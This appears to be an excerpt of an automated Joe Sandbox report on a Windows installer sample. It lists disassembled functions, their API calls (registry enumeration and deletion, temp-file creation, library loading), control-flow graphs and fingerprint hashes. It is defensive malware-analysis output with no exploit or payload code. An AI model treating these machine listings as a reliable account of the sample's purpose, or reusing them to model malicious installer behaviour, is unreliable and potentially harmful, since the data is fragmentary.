                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                            • API String ID: 1716503409-2113348990
                                                                                                            • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                            • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                            Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1059 402d44-402d6d call 406255 1061 402d72-402d74 1059->1061 1062 402d76-402d7c 1061->1062 1063 402dec-402df0 1061->1063 1064 402d98-402dad RegEnumKeyW 1062->1064 1065 402d7e-402d80 1064->1065 1066 402daf-402dc1 RegCloseKey call 4067c2 1064->1066 1067 402dd0-402dde RegCloseKey 1065->1067 1068 402d82-402d96 call 402d44 1065->1068 1073 402de0-402de6 RegDeleteKeyW 1066->1073 1074 402dc3-402dce 1066->1074 1067->1063 1068->1064 1068->1066 1073->1063 1074->1063
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$Enum
                                                                                                            • String ID:
                                                                                                            • API String ID: 464197530-0
                                                                                                            • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                            • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                            Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1076 40591f-40596a CreateDirectoryW 1077 405970-40597d GetLastError 1076->1077 1078 40596c-40596e 1076->1078 1079 405997-405999 1077->1079 1080 40597f-405993 SetFileSecurityW 1077->1080 1078->1079 1080->1078 1081 405995 GetLastError 1080->1081 1081->1079
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                            • GetLastError.KERNEL32 ref: 00405976
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                            • GetLastError.KERNEL32 ref: 00405995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID:
                                                                                                            • API String ID: 3449924974-0
                                                                                                            • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                            • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                            Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                              • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                            • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                            Function 004062B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseQueryValue
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3356406503-1824292864
                                                                                                            • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                            • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                            • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                            • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                            Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                            • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                            Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                            • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                            Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                            • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                            Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                            • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                            Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                            • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                            Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                            • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                            Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                            • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                            Function 004032DE Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                              • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                            • SetFilePointer.KERNELBASE(001710A7,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer$CountTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 1092082344-0
                                                                                                            • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                            • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                            • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                            • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                                                                            Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 334405425-0
                                                                                                            • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                            • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                            • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                            • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                                                                            Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nspC239.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
